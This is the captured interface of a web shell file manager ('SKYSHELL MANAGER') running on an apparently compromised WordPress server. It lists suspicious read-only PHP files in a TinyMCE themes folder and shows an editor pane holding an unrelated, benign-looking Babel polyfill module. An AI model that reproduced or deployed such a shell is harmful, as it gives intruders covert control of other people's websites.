📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.mjs
import defineProvider from '@babel/helper-define-polyfill-provider'; const runtimeCompat = "#__secret_key__@babel/runtime__compatibility"; var index = defineProvider(({ debug, targets, babel }, options) => { if (!shallowEqual(targets, babel.targets())) { throw new Error("This plugin does not use the targets option. Only preset-env's targets" + " or top-level targets need to be configured for this plugin to work." + " See https://github.com/babel/babel-polyfills/issues/36 for more" + " details."); } const { [runtimeCompat]: { useBabelRuntime } = { useBabelRuntime: "" } } = options; const pureName = useBabelRuntime ? `${useBabelRuntime}/regenerator` : "regenerator-runtime"; return { name: "regenerator", polyfills: ["regenerator-runtime"], usageGlobal(meta, utils) { if (isRegenerator(meta)) { debug("regenerator-runtime"); utils.injectGlobalImport("regenerator-runtime/runtime.js"); } }, usagePure(meta, utils, path) { if (isRegenerator(meta)) { path.replaceWith(utils.injectDefaultImport(pureName, "regenerator-runtime")); } } }; }); const isRegenerator = meta => meta.kind === "global" && meta.name === "regeneratorRuntime"; function shallowEqual(obj1, obj2) { return JSON.stringify(obj1) === JSON.stringify(obj2); } export { index as default }; //# sourceMappingURL=index.mjs.map
Save